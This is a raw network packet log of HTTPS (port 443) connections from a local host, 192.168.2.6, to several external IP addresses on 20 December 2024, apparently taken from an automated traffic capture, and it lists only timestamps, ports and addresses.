                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.547128916 CET49981443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.547450066 CET49981443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.547462940 CET44349981116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.800559998 CET49986443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.800595045 CET4434998652.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.800916910 CET49986443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.801095009 CET49986443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.801110029 CET4434998652.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.803914070 CET49987443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.803951979 CET4434998752.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.804220915 CET49987443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.804410934 CET49987443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.804429054 CET4434998752.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.637707949 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.637756109 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.637952089 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.638138056 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.638155937 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.797424078 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.797458887 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.797642946 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.797918081 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.797929049 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.943728924 CET44349981116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.943804979 CET49981443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.944256067 CET49981443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.944269896 CET44349981116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.946237087 CET49981443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.946244955 CET44349981116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.582613945 CET4434998652.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.582815886 CET4434998752.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.582931042 CET49986443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.582942009 CET4434998652.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.583118916 CET49987443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.583136082 CET4434998752.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.583451986 CET4434998652.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.583509922 CET4434998752.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.583769083 CET49986443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.583847046 CET4434998652.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.584060907 CET49987443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.584137917 CET4434998752.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.584275961 CET49986443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.584326982 CET49986443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.584372997 CET4434998652.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.584398031 CET49987443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.584420919 CET49987443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.584434986 CET4434998752.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.816134930 CET44349981116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.816205978 CET44349981116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.816230059 CET49981443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.816262960 CET49981443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.817226887 CET49981443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.817246914 CET44349981116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.962486029 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.962560892 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.962587118 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.962603092 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.963756084 CET49944443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.963776112 CET44349944116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.099786997 CET4434998652.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.100037098 CET4434998652.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.100100040 CET49986443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.100503922 CET49986443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.100522041 CET4434998652.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.100599051 CET49986443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.100615978 CET49986443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.102884054 CET4434998752.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.102977991 CET4434998752.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.103046894 CET49987443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.107131958 CET49987443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.107140064 CET4434998752.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.121073961 CET44349892172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.121164083 CET44349892172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.121263027 CET49892443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.126497030 CET44349893172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.126621008 CET44349893172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.126682997 CET49893443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.127298117 CET44349896172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.127477884 CET44349896172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.127531052 CET49896443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.129460096 CET44349895172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.129534006 CET44349895172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.129610062 CET49895443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.131472111 CET44349894172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.131525040 CET44349894172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.131576061 CET49894443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.370142937 CET44349897172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.370223999 CET44349897172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.370292902 CET49897443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.407193899 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.407525063 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.407552958 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.408581018 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.408644915 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.409189939 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.409275055 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.409596920 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.409609079 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.409728050 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.409760952 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.567148924 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.567529917 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.567563057 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.568660021 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.568748951 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.569066048 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.569139004 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.569238901 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.569248915 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.569277048 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.569288015 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.611954927 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.630831003 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.630873919 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.631169081 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.631452084 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:56.631469965 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.003278971 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.003381968 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.003921986 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.003935099 CET4434998952.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.003957033 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.003999949 CET49989443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.346393108 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.346596956 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.346659899 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.349132061 CET49990443192.168.2.652.178.17.2
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:57.349153996 CET4434999052.178.17.2192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.031908989 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.031986952 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.032444000 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.032458067 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034528971 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034537077 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034631014 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034641027 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034646988 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034651995 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034787893 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034801006 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034811020 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034827948 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034904957 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034925938 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.034981966 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.035152912 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.035392046 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:58.035403013 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.291547060 CET44349924162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.291558981 CET44349923162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.291626930 CET44349924162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.291631937 CET44349923162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.291692972 CET49923443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.291695118 CET49924443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.645759106 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.645857096 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.645869017 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.645935059 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.646133900 CET49995443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.646156073 CET44349995116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.691734076 CET50003443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.691766977 CET44350003116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.691868067 CET50003443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.692049980 CET50003443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:59.692065001 CET44350003116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.068273067 CET49892443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.068311930 CET44349892172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.068412066 CET49893443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.068425894 CET44349893172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.068578959 CET49896443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.068614006 CET44349896172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.068666935 CET49894443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.068672895 CET44349894172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.068718910 CET49895443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.068726063 CET44349895172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.068743944 CET49897443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.068769932 CET44349897172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.098570108 CET44350003116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.098660946 CET50003443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.292951107 CET50003443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.292972088 CET44350003116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.354530096 CET50003443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.354553938 CET44350003116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.770558119 CET4434990823.44.201.16192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.770653009 CET4434990823.44.201.16192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:01.770716906 CET49908443192.168.2.623.44.201.16
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.222944021 CET44350003116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.223021030 CET44350003116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.223042011 CET50003443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.223079920 CET50003443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.223227024 CET50003443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.223248959 CET44350003116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.224925995 CET50010443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.224972963 CET44350010116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.225101948 CET50010443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.225389004 CET50010443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.225404024 CET44350010116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.432704926 CET4434991423.44.201.22192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.432773113 CET4434991423.44.201.22192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.432835102 CET49914443192.168.2.623.44.201.22
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.736448050 CET49914443192.168.2.623.44.201.22
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.736471891 CET4434991423.44.201.22192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.736566067 CET49908443192.168.2.623.44.201.16
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:02.736581087 CET4434990823.44.201.16192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:03.630408049 CET44350010116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:03.630501986 CET50010443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:03.631198883 CET50010443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:03.631208897 CET44350010116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:03.633724928 CET50010443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:03.633732080 CET44350010116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:04.542186975 CET44350010116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:04.542259932 CET44350010116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:04.542274952 CET50010443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:04.542354107 CET50010443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:04.542485952 CET50010443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:04.542495012 CET44350010116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:05.325855970 CET50022443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:05.325897932 CET4435002220.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:05.326078892 CET50022443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:05.326698065 CET50022443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:05.326714039 CET4435002220.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:06.775516987 CET4434993923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:06.775609970 CET4434993923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:06.775770903 CET49939443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.131138086 CET4434994223.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.131274939 CET4434994223.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.131383896 CET49942443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.543951035 CET4435002220.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.544049025 CET50022443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.548046112 CET50022443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.548058033 CET4435002220.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.548899889 CET4435002220.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.554238081 CET50022443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.554330111 CET50022443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.554336071 CET4435002220.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.554538965 CET50022443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.595330954 CET4435002220.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.766307116 CET49939443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.766336918 CET4434993923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.766371012 CET49942443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:07.766391993 CET4434994223.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:08.216506958 CET4435002220.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:08.216737032 CET4435002220.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:08.216850996 CET50022443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:08.217032909 CET50022443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:08.217053890 CET4435002220.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:10.477078915 CET4434996823.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:10.477170944 CET4434996823.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:10.477313995 CET49968443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:10.484678984 CET4434996723.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:10.484752893 CET4434996723.44.201.38192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:10.484893084 CET49967443192.168.2.623.44.201.38
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:20.757846117 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:20.757930040 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:20.758164883 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:20.759387970 CET50061443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:20.759423971 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:22.997183084 CET4435006120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:22.997288942 CET50061443192.168.2.620.198.119.143
